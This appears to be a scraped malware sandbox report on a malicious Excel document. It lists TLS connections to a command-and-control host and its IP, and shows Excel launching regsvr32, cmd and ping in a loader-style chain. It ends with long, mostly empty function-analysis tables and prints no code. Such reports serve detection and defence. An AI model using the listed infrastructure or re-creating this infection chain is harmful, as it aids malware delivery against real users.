CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Tue May 03 09:00:00 CEST 2011 | Sat May 03 09:00:00 CEST 2031 | |||||||
Jun 9, 2021 15:22:49.386614084 CEST | 18.117.84.120 | 443 | 192.168.2.6 | 49740 | CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT | CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT | Wed Jun 09 10:22:21 CEST 2021 | Thu Jun 09 10:22:21 CEST 2022 | 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,5-10-11-13-35-23-65281,29-23-24,0 | 8916410db85077a5460817142dcbc8de |
Jun 9, 2021 15:23:25.363224030 CEST | 18.117.84.120 | 443 | 192.168.2.6 | 49747 | CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT | CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT | Wed Jun 09 10:22:21 CEST 2021 | Thu Jun 09 10:22:21 CEST 2022 | 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,5-10-11-13-35-23-65281,29-23-24,0 | 8916410db85077a5460817142dcbc8de |
Jun 9, 2021 15:23:57.298791885 CEST | 18.117.84.120 | 443 | 192.168.2.6 | 49750 | CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT | CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT | Wed Jun 09 10:22:21 CEST 2021 | Thu Jun 09 10:22:21 CEST 2022 | 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,5-10-11-13-35-23-65281,29-23-24,0 | 8916410db85077a5460817142dcbc8de |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
High Level Behavior Distribution |
---|
back
Click to dive into process behavior distribution
Behavior |
---|
Click to jump to process
System Behavior |
---|
General |
---|
Start time: | 15:21:49 |
Start date: | 09/06/2021 |
Path: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x10000 |
File size: | 27110184 bytes |
MD5 hash: | 5D6638F2C8F8571C593999C58866007E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:21:55 |
Start date: | 09/06/2021 |
Path: | C:\Windows\SysWOW64\regsvr32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xe50000 |
File size: | 20992 bytes |
MD5 hash: | 426E7499F6A7346F0410DEAD0805586B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:21:56 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62a730000 |
File size: | 24064 bytes |
MD5 hash: | D78B75FC68247E8A63ACBA846182740E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:22:03 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7180e0000 |
File size: | 273920 bytes |
MD5 hash: | 4E2ACF4F8A396486AB4268C94A6A245F |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:22:04 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff61de10000 |
File size: | 625664 bytes |
MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:22:04 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\PING.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff612a90000 |
File size: | 21504 bytes |
MD5 hash: | 6A7389ECE70FB97BFE9A570DB4ACCC3B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
General |
---|
Start time: | 15:22:13 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62a730000 |
File size: | 24064 bytes |
MD5 hash: | D78B75FC68247E8A63ACBA846182740E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:22:17 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7180e0000 |
File size: | 273920 bytes |
MD5 hash: | 4E2ACF4F8A396486AB4268C94A6A245F |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:22:18 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff61de10000 |
File size: | 625664 bytes |
MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:22:19 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\PING.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff612a90000 |
File size: | 21504 bytes |
MD5 hash: | 6A7389ECE70FB97BFE9A570DB4ACCC3B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
General |
---|
Start time: | 15:22:28 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62a730000 |
File size: | 24064 bytes |
MD5 hash: | D78B75FC68247E8A63ACBA846182740E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:22:34 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7180e0000 |
File size: | 273920 bytes |
MD5 hash: | 4E2ACF4F8A396486AB4268C94A6A245F |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:22:34 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff61de10000 |
File size: | 625664 bytes |
MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
General |
---|
Start time: | 15:22:35 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\PING.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff612a90000 |
File size: | 21504 bytes |
MD5 hash: | 6A7389ECE70FB97BFE9A570DB4ACCC3B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
General |
---|
Start time: | 15:22:43 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62a730000 |
File size: | 24064 bytes |
MD5 hash: | D78B75FC68247E8A63ACBA846182740E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
General |
---|
Start time: | 15:22:44 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62a730000 |
File size: | 24064 bytes |
MD5 hash: | D78B75FC68247E8A63ACBA846182740E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
General |
---|
Start time: | 15:22:51 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62a730000 |
File size: | 24064 bytes |
MD5 hash: | D78B75FC68247E8A63ACBA846182740E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Disassembly |
---|
Code Analysis |
---|
Executed Functions |
---|
Function 012E02A4, Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 542COMMONCrypto
C-Code - Quality: 71% |
|
APIs |
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 012D8282, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 192processCOMMONCrypto
C-Code - Quality: 42% |
|
APIs |
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 012D4554, Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 505processCOMMONCrypto
C-Code - Quality: 66% |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 012D8D11, Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 530libraryCOMMONCrypto
C-Code - Quality: 55% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 012DEFD3, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 170libraryCOMMON
C-Code - Quality: 71% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 012D3A22, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63synchronizationCOMMON
C-Code - Quality: 37% |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 44% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 012DD1C4, Relevance: 1.7, APIs: 1, Instructions: 153COMMON
C-Code - Quality: 60% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 012DC450, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
C-Code - Quality: 15% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 012D3998, Relevance: 1.5, APIs: 1, Instructions: 36COMMON
C-Code - Quality: 75% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Non-executed Functions |
---|
Function 00007FFD696A9D9D, Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 227pipetimeCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD696A6DAE, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 252filewindowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 50% |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 71% |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 70% |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 56% |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 46% |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 45% |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 59% |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD696B3508, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD696B3714, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 101COMMON
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 100% |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 87% |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 72% |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 55% |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD696A1788, Relevance: .6, Instructions: 650COMMON
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 012DD57B, Relevance: .4, Instructions: 387COMMONCrypto
C-Code - Quality: 51% |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 012D9F06, Relevance: .3, Instructions: 308COMMONCrypto
C-Code - Quality: 74% |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD696A1284, Relevance: .3, Instructions: 306COMMON
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 012D3B01, Relevance: .3, Instructions: 262COMMONCrypto
C-Code - Quality: 95% |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 012D5372, Relevance: .2, Instructions: 194COMMONCrypto
C-Code - Quality: 37% |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 012D5EF8, Relevance: .1, Instructions: 144COMMONCrypto
C-Code - Quality: 100% |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD696B2254, Relevance: .1, Instructions: 135COMMON
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 012DC6ED, Relevance: .1, Instructions: 119COMMONCrypto
C-Code - Quality: 100% |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD696B8940, Relevance: .0, Instructions: 32COMMON
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD696AA6E2, Relevance: 26.6, APIs: 9, Strings: 6, Instructions: 366memoryfileCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD696AC7C3, Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 299pipetimeCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD696AE458, Relevance: 16.0, APIs: 2, Strings: 7, Instructions: 233libraryloaderCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD696A720B, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 204COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD696B8CC8, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD696B1B7C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD696B7A70, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD696ABEDA, Relevance: 6.2, APIs: 4, Instructions: 198filememoryCOMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD696B1E20, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 112COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD696B4D9C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD696B4AD0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD696B4A6C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD696B4A18, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD696B4BAC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Executed Functions |
---|
Function 005D02A4, Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 542COMMONCrypto
C-Code - Quality: 71% |
|
APIs |
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 005C8282, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 192processCOMMONCrypto
C-Code - Quality: 42% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 005C5183, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 125fileCOMMON
C-Code - Quality: 28% |
|
APIs |
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 005CEFD3, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 170libraryCOMMON
C-Code - Quality: 71% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 005C5006, Relevance: 4.6, APIs: 3, Instructions: 102fileCOMMON
C-Code - Quality: 35% |
|
APIs |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 005C3A22, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63synchronizationCOMMON
C-Code - Quality: 37% |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 005CA504, Relevance: 1.7, APIs: 1, Instructions: 236COMMON
C-Code - Quality: 57% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 44% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 005CD1C4, Relevance: 1.7, APIs: 1, Instructions: 153COMMON
C-Code - Quality: 60% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 005CC450, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
C-Code - Quality: 15% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Non-executed Functions |
---|
Function 00007FFD69649D9D, Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 227pipetimeCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD69646DAE, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 252filewindowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD69653508, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD6964A6E2, Relevance: 28.4, APIs: 9, Strings: 7, Instructions: 366memoryfileCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD6964C7C3, Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 299pipetimeCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD6964E458, Relevance: 16.0, APIs: 2, Strings: 7, Instructions: 233libraryloaderCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD6964720B, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 204COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD69658CC8, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD69651B7C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD69651E20, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD69657A70, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD6964BEDA, Relevance: 6.2, APIs: 4, Instructions: 198filememoryCOMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD69654D9C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD69654AD0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD69654A6C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD69654A18, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD69654BAC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Executed Functions |
---|
Function 004602A4, Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 542COMMONCrypto
C-Code - Quality: 71% |
|
APIs |
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0045A8E0, Relevance: 12.9, APIs: 3, Strings: 4, Instructions: 609registryCOMMONCrypto
C-Code - Quality: 58% |
|
APIs |
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00458282, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 192processCOMMONCrypto
C-Code - Quality: 42% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0045EFD3, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 170libraryCOMMON
C-Code - Quality: 71% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00453A22, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63synchronizationCOMMON
C-Code - Quality: 37% |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 44% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0045D1C4, Relevance: 1.7, APIs: 1, Instructions: 153COMMON
C-Code - Quality: 60% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0045C450, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
C-Code - Quality: 15% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Non-executed Functions |
---|
Executed Functions |
---|
Function 00A16537, Relevance: 22.1, APIs: 2, Strings: 10, Instructions: 1095networkCOMMONCrypto
C-Code - Quality: 72% |
|
APIs |
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00A202A4, Relevance: 16.3, APIs: 2, Strings: 7, Instructions: 543COMMONCrypto
C-Code - Quality: 71% |
|
APIs |
|
Strings |
Memory Dump Source |
|
